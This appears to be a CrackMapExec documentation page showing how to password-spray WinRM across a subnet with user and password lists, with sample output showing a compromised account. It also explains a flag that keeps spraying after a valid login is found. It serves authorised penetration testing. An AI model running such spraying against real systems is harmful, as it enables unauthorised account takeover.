Password spraying

Password spraying (without bruteforce)

1
#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Copied!
Expected Results:
1
WINRM 192.168.255.131 5985 ROGER [*] http://192.168.255.131:5985/wsman
2
WINRM 192.168.255.131 5985 ROGER [-] GOLD\test1:pass1 "Failed to authenticate the user test1 with ntlm"
3
WINRM 192.168.255.131 5985 ROGER [+] GOLD\bonclay:[email protected] (Pwn3d!)
Copied!
By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.
​
Last modified 1yr ago
Copy link